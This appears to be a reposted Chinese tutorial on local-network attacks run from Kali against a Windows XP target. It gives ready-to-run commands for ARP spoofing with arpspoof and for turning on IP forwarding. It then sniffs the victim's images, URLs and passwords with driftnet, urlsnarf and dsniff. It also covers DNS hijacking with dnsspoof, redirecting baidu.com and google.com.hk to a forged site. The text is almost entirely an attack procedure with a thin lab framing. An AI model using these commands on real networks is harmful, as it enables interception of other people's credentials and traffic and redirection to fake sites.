局域網下ARP欺騙、嗅探,以及DNS欺騙


 

准備:kali、xp

kali ip:192.168.14.157

目標ip:192.168.14.158

目標網關:192.168.14.2

 

ARP欺騙:
arpspoof -t 目標ip -r 目標網關

命令:arpspoof  -i  eth0 -t 192.168.14.158 -r 192.168.14.2

 

 我們可以看到xp認為網關的MAC地址和KAli是一樣的

顯示我們欺騙成功

但現在xp是不能上網的

kali 默認不會開啟流量轉發

 

我們在xp下是不能上網的

 

 

 打開流量轉發的功能:

查看(默認kali沒有開啟流量轉發功能,值為0)

命令:cat /proc/sys/net/ipv4/ip_forward

默認值為0

 

開啟流量轉發

 命令:echo 1 > /proc/sys/net/ipv4/ip_forward

 

 我們回來看kali是否能上網

能上網

 

 

 網絡嗅探

 

竊取瀏覽中的圖片:

命令:driftnet -i eth0

會打開一個窗口

 

 

我們去xp瀏覽網站

再看看效果

可以看到瀏覽過的網頁照片都在這里顯示

 

 還可以抓取聲音文件

你也可以把圖片放到一起,放到一個目錄下

新建目錄:
mkdir 目錄名

-例如 mkdir tempdir/ 

把抓的圖片保存到目錄:
-driftnet -i eth0 -a -d tempdir/ -s(聲音文件)

 

 

抓傳輸過程瀏覽的url:

命令:urlsnarf -i eth0

 

 

嗅探密碼:

命令:dsniff -i eth0 -m

 

 

 

 

DNS欺騙(域名劫持)

 

你也可以進行域名劫持,讓對方訪問一個網站解析到不准確或者偽造的網站上

你需要自己配制欺騙的域名

本人沒有找到自帶的域名集

只能自己編輯

格式:

偽造網站ip  *.baidu.com
偽造網站ip  *.google.com.hk

 

查看:cat /usr/share/dsniff/dnsspoof.hosts


編輯:vi /usr/share/dsniff/dnsspoof.hosts

執行命令:dnsspoof -i eth0 -f /usr/share/dsniff/dnsspoof.hosts

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM